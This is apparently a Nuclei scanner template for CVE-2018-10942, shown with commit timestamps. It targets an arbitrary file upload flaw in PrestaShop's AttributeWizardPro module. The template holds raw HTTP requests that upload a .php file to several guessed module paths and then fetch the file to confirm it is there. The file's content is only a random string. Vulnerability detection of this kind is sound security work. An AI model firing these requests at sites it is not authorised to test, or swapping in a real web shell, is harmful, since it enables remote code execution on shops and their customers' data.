nuclei-templates/http/cves/2018/CVE-2018-10942.yaml

78 lines
2.4 KiB
YAML
Raw Normal View History

2023-12-31 16:09:36 +00:00
id: CVE-2018-10942
info:
2024-01-19 19:18:10 +00:00
name: Prestashop AttributeWizardPro Module - Arbitrary File Upload
2023-12-31 16:09:36 +00:00
author: MaStErChO
severity: critical
description: |
In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.
reference:
- https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
2024-01-19 19:18:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-10942
classification:
2024-05-31 19:23:20 +00:00
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2024-01-19 19:18:10 +00:00
cve-id: CVE-2018-10942
2024-05-31 19:23:20 +00:00
cwe-id: CWE-434
epss-score: 0.18241
epss-percentile: 0.96178
cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:*
2023-12-31 16:09:36 +00:00
metadata:
max-request: 8
2024-05-31 19:23:20 +00:00
vendor: attribute_wizard_project
product: attribute_wizard
framework: prestashop
tags: prestashop,attributewizardpro,intrusive,file-upload
2023-12-31 16:09:36 +00:00
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /modules/{{paths}}/file_upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818
--ba1f796d0aa2482e9c51c81ae6087818
Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php"
Content-Type: multipart/form-data
{{randstr}}
--ba1f796d0aa2482e9c51c81ae6087818--
2024-01-19 19:18:10 +00:00
2023-12-31 16:09:36 +00:00
- |
GET /modules/{{paths}}/file_uploads/{{file}} HTTP/1.1
Host: {{Hostname}}
payloads:
paths:
- 'attributewizardpro'
- '1attributewizardpro'
- 'attributewizardpro.OLD'
- 'attributewizardpro_x'
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '{{filename}}'
2024-01-19 19:18:10 +00:00
2023-12-31 16:09:36 +00:00
- type: word
part: body_2
words:
- '{{randstr}}'
2024-01-19 19:18:10 +00:00
2023-12-31 16:09:36 +00:00
extractors:
- type: regex
name: file
part: body_1
internal: true
group: 1
regex:
2024-01-19 19:18:10 +00:00
- '(.*?)\|\|\|\|'
# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950